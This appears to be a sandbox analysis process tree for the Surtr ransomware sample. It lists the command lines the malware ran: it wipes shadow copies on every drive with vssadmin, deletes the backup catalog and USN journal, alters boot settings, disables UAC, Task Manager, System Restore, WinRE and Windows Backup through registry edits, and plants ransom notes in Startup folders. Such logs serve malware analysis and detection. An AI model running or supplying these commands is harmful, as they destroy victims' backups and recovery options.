-
C:\Windows\System32\cmd.exe (level 2)
command line: "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
-
C:\Windows\system32\vssadmin.exe (level 3)
command line: vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe (level 2)
command line: "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
-
C:\Windows\system32\bcdedit.exe (level 3)
command line: bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
- Modifies boot configuration data using bcdedit
-
C:\Windows\System32\cmd.exe (level 2)
command line: "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
-
C:\Windows\system32\vssadmin.exe (level 3)
command line: vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe (level 2)
command line: "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
-
C:\Windows\system32\fsutil.exe (level 3)
command line: fsutil.exe usn deletejournal /D C:
-
C:\Windows\System32\cmd.exe (level 2)
command line: "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
-
C:\Windows\system32\wbadmin.exe (level 3)
command line: wbadmin.exe delete catalog -quiet
- Deletes backup catalog
-
C:\Windows\System32\cmd.exe (level 2)
command line: "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
-
C:\Windows\system32\vssadmin.exe (level 3)
command line: vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe (level 2)
command line: "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
-
C:\Windows\system32\vssadmin.exe (level 3)
command line: vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe (level 2)
command line: "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
-
C:\Windows\system32\schtasks.exe (level 3)
command line: schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
-
C:\Windows\System32\cmd.exe (level 2)
command line: "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
-
C:\Windows\system32\vssadmin.exe (level 3)
command line: vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe (level 2)
command line: "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exe (level 3)
command line: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
-
C:\Windows\System32\cmd.exe (level 2)
command line: "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PublicData_0r6fjlh4j8u4ts.surt" "%TEMP%\Service\PublicData_0r6fjlh4j8u4ts.surt"2⤵
-
